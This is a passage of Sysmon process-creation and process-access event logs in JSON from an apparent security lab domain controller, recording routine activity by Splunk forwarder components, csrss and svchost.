Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.949","SourceProcessGUID":"{A837DB8D-049D-5F25-0000-0010D58F0F00}","SourceProcessId":"172","SourceThreadId":"3372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7310,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.481\r\nProcessGuid: {A837DB8D-049E-5F25-0000-001088910F00}\r\nProcessId: 4348\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.481","ProcessGuid":"{A837DB8D-049E-5F25-0000-001088910F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7311,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-049E-5F25-0000-001088910F00}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-049E-5F25-0000-001088910F00}","TargetProcessId":"4348","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7312,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049E-5F25-0000-001088910F00}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049E-5F25-0000-001088910F00}","TargetProcessId":"4348","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7313,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7314,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7315,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7316,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7317,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:54.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:54.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 